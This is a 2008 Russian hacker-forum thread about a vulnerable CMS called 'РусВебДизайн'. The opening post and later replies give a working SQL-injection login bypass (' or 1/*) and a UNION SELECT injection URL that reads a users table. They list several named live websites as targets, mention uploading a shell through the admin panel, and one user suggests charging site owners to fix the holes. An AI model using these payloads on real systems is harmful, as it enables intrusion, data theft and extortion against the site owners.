Дырявая «cms РусВебДизайн»

Discussion in 'Уязвимости' started by mailbrush, 11 Aug 2008.

  1. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Пример того, как не стоит делать CMS.
    Офф. сайт - http://ruswebdesign.ru/, причем у них эта CMS не стоит, боятся видимо юзать.

    Пример: http://www.alpgalka.ru/admin/
    Достаточно ввести в поле логин ' or 1/* и нажать Войти. В админке очень удобно загружать шелл.
    Ну и sql-инъекции типа http://www.alpgalka.ru/?page_id=4'

    http://www.microplasma.ru/admin/
    http://www.akabel.ru/admin/
    http://www.eurovolga.ru/admin/

    © xaker.name​
     
    #1 mailbrush, 11 Aug 2008
    Last edited: 15 Aug 2008
    10 people like this.
  2. luz3r

    luz3r Banned

    Joined:
    23 Feb 2008
    Messages:
    119
    Likes Received:
    250
    Reputations:
    -11
    кул уязвимость!!! + =)
     
  3. Don Anton

    Don Anton Elder - Старейшина

    Joined:
    28 Feb 2008
    Messages:
    35
    Likes Received:
    121
    Reputations:
    4
    Копирайты поставь) А то все думают, что это ты нашёл)))
     
  4. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    +1 Don Anton
     
  5. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    чет я пробовал,логин admin ,эту фичу,но не робит,скорее всего у меня руки кривые
    ------------------------------
    Я ж говорил,что я кривой,надо мне по больше спать =)
     
    #5 DDoSька, 11 Aug 2008
    Last edited: 13 Aug 2008
  6. NApoleonchik

    NApoleonchik Elder - Старейшина

    Joined:
    4 Jul 2007
    Messages:
    79
    Likes Received:
    39
    Reputations:
    4
    ку

    все работает) автору +
     
  7. TheJahte

    TheJahte New Member

    Joined:
    28 Jun 2008
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    Прямо говорю )) Дибилы писали xD
     
  8. luz3r

    luz3r Banned

    Joined:
    23 Feb 2008
    Messages:
    119
    Likes Received:
    250
    Reputations:
    -11
    В логине пишеш - ' or 1/ * , пасс остовляеш пустым =)
     
  9. TheJahte

    TheJahte New Member

    Joined:
    28 Jun 2008
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    Таверна Античат xDDDDDDDD бля... кто так жестко отжоГ ?
     
  10. TheJahte

    TheJahte New Member

    Joined:
    28 Jun 2008
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    http://www.alpgalka.ru/__install/ псц
     
  11. lisa99

    lisa99 Banned

    Joined:
    15 Jul 2008
    Messages:
    359
    Likes Received:
    200
    Reputations:
    70
    ну и дурость.
    нафига палить античат??
    напиши - "сайт содержит уязвимсоти. исправим за разумные деньги."..и тп


    - и аську..кого-нить из .........))))
     
  12. TheJahte

    TheJahte New Member

    Joined:
    28 Jun 2008
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    Ага )) твою :d
     
  13. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    http://www.xaker.name/forvb/showthread.php?p=73641
     
  14. luz3r

    luz3r Banned

    Joined:
    23 Feb 2008
    Messages:
    119
    Likes Received:
    250
    Reputations:
    -11
    Интересно кто же скопипастил...
     
    1 person likes this.
  15. Don Anton

    Don Anton Elder - Старейшина

    Joined:
    28 Feb 2008
    Messages:
    35
    Likes Received:
    121
    Reputations:
    4
    Оба наверно)
     
    5 people like this.
  16. TheJahte

    TheJahte New Member

    Joined:
    28 Jun 2008
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    Кто скопипастил - тот умрет.
     
  17. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    Cms-говно,долго удивлялся....горе кодеры
    _______________________________________
    А вот и нубо-детки играються :
    [​IMG]
    Столько пафоса =) ну что ж сказать,ТрЮ Хацкер)
    _________________________________________
    Я даже знаю как баг залечить,нужен дед через него захим в админку и все тру хацкеры не могут зайти,ибо выдает,что админ уже залогинен =)
    ЗЫ:надо будет на милворм написать - они нуждаються в моих творениях)
     
    #17 DDoSька, 13 Aug 2008
    Last edited: 13 Aug 2008
  18. FaR-G9

    FaR-G9 Member

    Joined:
    19 Dec 2006
    Messages:
    114
    Likes Received:
    28
    Reputations:
    -4
    прикрыли походу
     
  19. luz3r

    luz3r Banned

    Joined:
    23 Feb 2008
    Messages:
    119
    Likes Received:
    250
    Reputations:
    -11
    О нет , Web kill , он всех хакнет ............... нед.................. =\\\
     
  20. TheJahte

    TheJahte New Member

    Joined:
    28 Jun 2008
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    http://alpgalka.ru/news.php?nid=7'+union+select+1,2,3,4,5,6,7,8+from+rwd_users/* чо за нах ? :D